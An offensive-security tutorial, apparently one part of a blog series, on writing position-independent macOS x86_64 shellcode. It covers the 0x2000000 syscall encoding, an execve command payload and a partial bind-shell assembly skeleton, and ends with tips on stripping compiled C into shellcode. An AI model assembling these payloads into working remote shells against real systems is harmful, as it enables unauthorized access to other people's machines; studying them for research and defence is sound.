Writing macOS Shellcode From Scratch: Syscalls, Bind Shells, and the 0x2000000 Trick

Shellcode is the payload that runs after the bug. The vulnerability gets you control of execution; the shellcode is what you do with it. On macOS that usually means popping a shell, reverse or bind, but it can be anything: spawn a process, write a file, load a dylib. The constraint that shapes everything is position. Shellcode runs wherever it lands, so it cannot assume a fixed address for itself or anything it touches. No hardcoded pointers, no linker, no loader doing your relocations. Just registers, the stack, and the kernel.

This post builds macOS shellcode from nothing: first the syscall mechanism and the one encoding quirk that separates macOS from Linux, then a command-execution payload via execve, then a bind shell, and finally the trickier business of writing shellcode in C and stripping out everything the compiler adds that would break it. Everything here uses the previous post’s toolkit (DTrace to confirm the right syscalls fire, LLDB to step the payload) so this is where the reading turns into writing.

Syscalls and the One Quirk That Matters

A system call is how user code asks the kernel to do something privileged: open a file, create a socket, replace the running image. To make one on x86_64 you load a syscall number into RAX, put the arguments in the AMD64 argument registers (RDI, RSI, RDX, R10, R8, R9, in that order) and execute the syscall instruction.¹

That much is identical to Linux. Here is what is not. macOS supports several classes of syscall (BSD, Mach, Mach IPC, machine-dependent) and the class is encoded into the number itself.² The class lives in the high bits, shifted left by SYSCALL_CLASS_SHIFT (24). Traditional BSD syscalls, the ones you want for shells and files, carry class 2, which becomes 0x2000000. So the real number you load into RAX is 0x2000000 + bsd_number.

The BSD numbers come from XNU’s bsd/kern/syscalls.master. A few that matter:

# filename: syscalls.master (excerpt)
 1   exit       4   write      30  accept     59  execve
 90  dup2       97  socket     98  connect    104 bind       106 listen

So execve is BSD 59 (0x3b), and the value you actually load is 0x200003b. Forget the 0x2000000 and your syscall silently does the wrong thing or faults: it is the single most common mistake porting Linux shellcode habits to macOS. A minimal payload that writes “hi” and exits:

; filename: hello.asm
    mov     rax, 0x2000004   ; write  (BSD 4 | class 2)
    mov     rdi, 1           ; fd = stdout
    mov     rbx, 'hi'
    push    rbx
    mov     rsi, rsp         ; buf = pointer to "hi" on the stack
    mov     rdx, 2           ; len = 2
    syscall

    mov     rax, 0x2000001   ; exit (BSD 1 | class 2)
    mov     rdi, 0
    syscall

Notice there is no .data section, no string constant living at a known address. The string “hi” is pushed onto the stack at runtime and RSI points at it wherever the stack happens to be. That is the discipline of shellcode in miniature: build your data on the stack, point at it with the stack pointer, never name an absolute address.

Verify with DTrace, not faith. syscall:::entry /execname == "yourbinary"/ { printf("%s\n", probefunc); } prints every syscall the payload makes in order. If write and exit show up, the encoding is right. If nothing shows up, you got the 0x2000000 wrong.

Executing a Command With execve

Running an arbitrary command is one syscall: execve(path, argv, envp), which replaces the current process image with a new one. The clean way to run a shell command is to invoke a shell with -c:

// filename: target-call.c
char *argp[] = { "/bin/zsh", "-c", "touch /tmp/mynewfile.txt", NULL };
execve("/bin/zsh", argp, NULL);

We use /bin/zsh because Apple made zsh the default shell in Catalina; it is reliably present. execve wants three things in registers: RDI pointing at the path string, RSI pointing at the argv array, and RDX for envp (which we can leave NULL). The whole job is constructing those two structures on the stack with no fixed addresses.

The key insight is that the stack grows downward and arrays must be assembled backwards: you push the last element first. The argv array is NULL-terminated, so NULL goes down first, then a pointer to the command string, then -c, then /bin/zsh. And each of those pointers has to point at a string you also placed on the stack. The pattern for one string:

; filename: execve-string.asm
    xor     rdx, rdx          ; RDX = 0, our reusable NULL
    push    rdx               ; NULL-terminate the string on the stack
    mov     rbx, '/bin/zsh'   ; 8 bytes, fits one register
    push    rbx               ; "/bin/zsh\0" now sits on the stack
    mov     rdi, rsp          ; RDI -> the string (execve's first arg)

You repeat that idea for -c and the command, saving each string’s stack address into a temporary register. Then you build the argv array itself by pushing those saved pointers (NULL first, then the command pointer, then -c, then /bin/zsh) and point RSI at the top. Load RAX with 0x200003b, fire syscall, and the process becomes your command.

A small but real optimization, because shellcode size sometimes matters: mov rdi, rsp assembles to three bytes (48 89 e7), while push rsp / pop rdi does the same job in two (54 5f). When a buffer is tight, those single bytes decide whether the payload fits. When it is not, clarity wins.

A Bind Shell in Assembly

A command-exec payload is fine when you already have a channel. When you do not, you want a shell listening on a socket. A bind shell is a sequence of socket syscalls glued to an execve, and writing it by hand is the best way to internalize how Berkeley sockets actually work at the syscall level:

socket(AF_INET, SOCK_STREAM, 0), BSD 97, create a TCP socket. The returned file descriptor is the thread you have to keep hold of across every following call; stash it somewhere stable like R8, because RAX gets clobbered by the next syscall.
bind(fd, &sockaddr, len), BSD 104, bind it to an address and port. The sockaddr_in struct (family, port, address) is, again, built on the stack and pointed at. The port is stored in network byte order, so a little-endian mov needs the bytes swapped.
listen(fd, backlog), BSD 106, start accepting connections.
accept(fd, 0, 0), BSD 30, block until a client connects; this returns a new fd for the connection.
dup2(clientfd, n) for n in 0, 1, 2, BSD 90, wire the client socket onto stdin, stdout, and stderr. This is the step that makes the eventual shell actually talk over the network.
execve("/bin/zsh",...), and now zsh reads from and writes to the socket.

; filename: bindshell-skeleton.asm
    ; socket(AF_INET=2, SOCK_STREAM=1, 0)
    mov     rax, 0x2000061    ; socket (BSD 97)
    mov     rdi, 2
    mov     rsi, 1
    xor     rdx, rdx
    syscall
    mov     r8, rax           ; save the listening fd before RAX is reused
    ; ... bind, listen, accept ...
    ; dup2 loop wiring the client fd to fds 0,1,2
    ; execve /bin/zsh

The discipline that makes or breaks this is file-descriptor bookkeeping. Every syscall returns into RAX, so the socket fd you got from socket is gone the instant you call bind. Save it first. The same applies to the client fd from accept. Most broken bind shells are not broken cryptography or alignment: they are a clobbered file descriptor. Step it in LLDB and watch R8.

Shellcode in C, and Fighting the Compiler

Hand-assembly is precise but slow and error-prone. Writing the logic in C and compiling it is faster, but a compiler emits code that assumes it is a normal program, and several of those assumptions are fatal to shellcode. The work is in stripping them out.

Two big ones on macOS x86_64:

RIP-relative addressing. When C references a global string or variable, the compiler emits a load relative to the instruction pointer: lea rax, [rip + offset]. That is great for a normal binary the loader places at a known base, and useless for shellcode that runs at an unknown address, because the offset was computed for the original layout. The fix is to eliminate RIP-relative references entirely: keep data on the stack instead of in global sections, exactly like the assembly version does. No globals, no __DATA strings, nothing the compiler would address relative to RIP.

Calls into the __stub section. Call a libc function like execv from C and the compiler routes the call through a stub that the dynamic linker fixes up at load time. In shellcode there is no linker pass, so the stub is a dangling jump. The workaround is to bypass the stub and call the function directly: locate the real execv pointer (the same way the assembly payload would resolve an address) and call through it, so the path never touches the __stub indirection.

// filename: c-shellcode-notes.c
// Compile with optimizations and no stack protector, then extract __text.
// Then audit the disassembly for two things that must NOT appear:
//   - any  lea reg, [rip + ...]      (RIP-relative data reference)
//   - any  call <stub>              (lazy-bound import)
// If either survives, the payload breaks the moment it runs relocated.

The honest summary: writing shellcode in C does not save you from understanding the assembly: it just changes your job from writing it to auditing it. You compile, disassemble, find the constructs the compiler added that assume a loader, and surgically remove them until the __text section is genuinely position-independent. That review loop is its own skill, and it is where most of the time goes.

Why This Matters

Everything in this post is plumbing for the rest of the series. The injection posts (DYLD, dylib hijacking, Mach task ports) all need a payload to inject, and that payload is shellcode built on exactly these rules: position-independent, stack-constructed, 0x2000000-encoded. The BlockBlock case study later injects execv shellcode into a security product’s process; the shellcode it injects is the kind we just built. When a privilege-escalation chain ends in “and then we run our payload as root,” this is the payload.

The deeper point is the mindset. Shellcode forces you to think about code with no fixed address, data you carry with you, and a kernel interface you talk to in raw register conventions. That same discipline (assume nothing about layout, build what you need at runtime, verify with DTrace) is the discipline of every exploit that follows. Next we use it: getting a payload into a process we do not own, starting with the oldest trick in the macOS book, dylib injection.

References

AMD64 ABI. System V Application Binary Interface, x86-64 calling convention. ↩
Apple / XNU. bsd/kern/syscalls.master, osfmk/mach/i386/syscall_sw.h, XNU 7195.50.7.100.1. opensource.apple.com. ↩